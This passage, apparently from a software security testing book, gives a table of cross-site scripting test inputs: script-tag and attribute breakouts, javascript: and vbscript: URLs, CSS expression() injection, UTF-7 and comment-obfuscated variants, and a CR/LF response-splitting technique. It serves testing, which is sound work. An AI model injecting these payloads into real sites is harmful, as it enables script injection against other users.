The goal of this attack is to insert script in a place you can t normally and have other users run that script. Refer to Chapters 4 and 10.
Sample Test Cases | |
---|---|
Test Case | Description |
<SCRIPT>alert()</SCRIPT> | Standard script block. |
"><SCRIPT>alert()</SCRIPT> | Close attribute and tag, and then start a script block. |
'><SCRIPT>alert()</SCRIPT> | Close attribute and tag, and then start a script block. |
</SCRIPT><SCRIPT>alert()</SCRIPT> | Close current script block, and then start a new script block. |
javascript:alert() | Use this to execute script where a URL can be specified. |
vbscript:MsgBox() | Use this to execute script where a URL can be specified. |
" onclick=javascript:alert() x=" | Inject script by inserting an attribute. |
" style="font-family: expression(alert())" x=" | Inject script by inserting an attribute, and using the expres sion method. |
+ADw-SCRIPT+AD4- alert(); +ADw-/SCRIPT+AD4- | UTF-7 encoding of the script tag. |
<INPUT name="txtInput1" type="text" value="SomeValue" style="font-family: e/**/xpression(alert('Hi!'))" > | Uses C-style comments in the expression method to trick parsers. |
Injecting CR/LF | Injecting CR/LF is a common technique used to cause a HTTP content splitting attacks. If the CR/LF can be injected into values that could control HTTP headers in the server s response, a splitting attack could lead to script injection. |